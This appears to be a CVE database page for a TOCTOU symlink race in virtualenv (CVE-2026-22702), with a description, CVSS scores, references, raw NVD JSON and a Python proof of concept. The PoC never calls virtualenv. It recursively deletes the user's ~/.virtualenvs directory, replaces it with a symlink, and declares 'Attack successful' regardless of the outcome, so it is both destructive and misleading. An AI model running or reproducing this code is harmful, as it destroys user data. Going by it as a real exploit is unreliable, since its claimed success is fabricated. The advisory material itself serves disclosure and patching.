CVE-2026-22702

Description

virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1.

CVSS Details

CVSS Score

4.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:virtualenv:virtualenv:*:*:*:*:*:*:*:* - VULNERABLE

virtualenv < 20.36.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-22702 PoC - virtualenv TOCTOU symlink attack
Note: This is a conceptual PoC for educational and security research purposes only.
"""

import os
import time
import threading
import subprocess
import tempfile
import shutil

def toctou_attack():
    """
    Demonstrates TOCTOU vulnerability in virtualenv directory creation.
    Attack window exists between existence check and directory creation.
    """
    target_dir = os.path.expanduser("~/.virtualenvs")
    malicious_dir = tempfile.mkdtemp(prefix="malicious_")
    
    print(f"[*] Target directory: {target_dir}")
    print(f"[*] Malicious redirect: {malicious_dir}")
    
    # Race condition window - create symlink during check->create gap
    def create_symlink_race():
        time.sleep(0.001)  # Small delay to hit the race window
        if os.path.exists(target_dir):
            shutil.rmtree(target_dir)
        os.symlink(malicious_dir, target_dir)
        print(f"[+] Symlink created: {target_dir} -> {malicious_dir}")
    
    race_thread = threading.Thread(target=create_symlink_race)
    race_thread.start()
    
    # Trigger virtualenv directory creation (vulnerable code path)
    # In real attack, this would trigger virtualenv's internal operations
    try:
        os.makedirs(target_dir, exist_ok=True)
    except:
        pass
    
    race_thread.join()
    
    # Verify if symlink attack succeeded
    if os.path.islink(target_dir):
        print(f"[!] Attack successful - virtualenv would write to: {os.readlink(target_dir)}")
        return True
    return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-22702 - virtualenv TOCTOU Symlink Attack PoC")
    print("=" * 60)
    toctou_attack()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22702
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22702
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22702/
[4] VulDB https://vuldb.com/cve/CVE-2026-22702
[5] https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc
[6] https://github.com/pypa/virtualenv/pull/3013
[7] https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22702", "sourceIdentifier": "[email protected]", "published": "2026-01-10T07:16:02.857", "lastModified": "2026-02-18T17:43:08.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1."}, {"lang": "es", "value": "virtualenv es una herramienta para crear entornos virtuales de Python aislados. Antes de la versión 20.36.1, las vulnerabilidades TOCTOU (Time-of-Check-Time-of-Use) en virtualenv permiten a atacantes locales realizar ataques basados en enlaces simbólicos en operaciones de creación de directorios. Un atacante con acceso local puede explotar una condición de carrera entre las comprobaciones de existencia de directorios y su creación para redirigir las operaciones de los archivos app_data y de bloqueo de virtualenv a ubicaciones controladas por el atacante. Este problema ha sido parcheado en la versión 20.36.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:virtualenv:virtualenv:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.36.1", "matchCriteriaId": "1339346E-BA67-4C3F-8792-7F1829C91FA2"}]}]}], "references": [{"url": "https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pypa/virtualenv/pull/3013", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}]}}